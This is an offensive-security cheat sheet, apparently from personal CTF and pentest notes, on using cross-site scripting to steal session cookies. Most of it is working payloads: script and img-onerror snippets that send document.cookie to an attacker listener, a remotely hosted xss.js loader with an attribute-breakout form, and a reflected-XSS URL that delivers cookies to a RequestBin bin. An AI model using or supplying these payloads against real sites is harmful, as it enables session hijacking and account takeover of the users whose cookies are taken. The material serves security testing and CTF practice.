# Stealing Cookies

Stealing cookies to take over another user's session is the classic goal of an attacker exploiting a cross-site scripting vulnerability. Every payload below reads `document.cookie` and sends it to a listener you control; `172.0.0.1:1337` is used throughout as a placeholder for that listener's address. Note that cookies flagged `HttpOnly` are not exposed to `document.cookie` and will not be captured by any of these payloads.

### Payloads

#### Verification with alert()

This payload will pop an `alert()` box before sending the cookie. This is useful for testing a cross-site scripting payload and verifying that it is grabbing the intended information. Once the `alert()` box is closed, the cookie is sent to the attacker-controlled server as the query string of an image request:

```javascript
<script>
alert(document.cookie);
var i=new Image;
i.src="http://172.0.0.1:1337/?"+document.cookie;
</script>
```

#### Exfiltrating cookies without alert()

After verifying that the parameter is susceptible to cross-site scripting, we can leverage the following payload to exfiltrate cookies silently:

```javascript
<script>var i=new Image;i.src="http://172.0.0.1:1337/?"+document.cookie;</script>
```

#### CTF Only Payload

The following payload uses an `img` tag rather than `script`. The `src` of `x` fails to load, so `onerror` fires and points `src` at the listener; because the listener does not answer with a valid image, `onerror` fires again, and the request repeats for as long as the page stays open, ultimately filling your server's log with copies of the cookie. I have found this can be life-saving in a CTF when things may not be working as the author originally intended:

```javascript
<img src=x onerror=this.src='http://172.0.0.1:1337/?'+document.cookie;>
```

#### My Preferred Method

The way I like to capture cookies is to submit the following payload, which calls back to a JavaScript file that I host on a Python web server. The first form is for an injection point in the page body; the second closes the surrounding attribute value and tag first, for an injection point inside an HTML attribute:

```javascript
<script src="http://172.0.0.1/xss.js"></script>
"><script src=http://172.0.0.1/xss.js></script>
```

The `xss.js` file looks like the following. It does the same thing as the payloads above: it reads the cookies and sends them to my hosted web server as the query string of an image request:

```javascript
// Build an <img> whose src carries the cookies to the listener as the query string;
// the browser issues the GET as soon as src is set, so no response is needed.
function pwn() {
    var img = document.createElement("img");
    img.src = "http://172.0.0.1/xss?=" + document.cookie;
    document.body.appendChild(img);
}
pwn();
```

### Capturing the Cookies

Unless you're in a CTF environment, I would highly recommend capturing the cookies on a local web server or a Burp Collaborator instance you control. I'm not sure about you, but sending cookies to a random website seems like a bad idea to me. That said, hosted request catchers such as RequestBin exist and can be used as the destination. In the reflected-XSS URL below, `172.0.0.1:1337` stands for the vulnerable application and `requestbin.net/r/mybin` for the bin that receives the cookie:

```javascript
http://172.0.0.1:1337/<script>new Image().src="http://requestbin.net/r/mybin?c="+document.cookie;</script>
```

### References

{% embed url="https://github.com/R0B1NL1N/WebHacking101/blob/master/xss-reflected-steal-cookie.md" %}

{% embed url="https://snowscan.io/htb-writeup-bankrobber/" %}
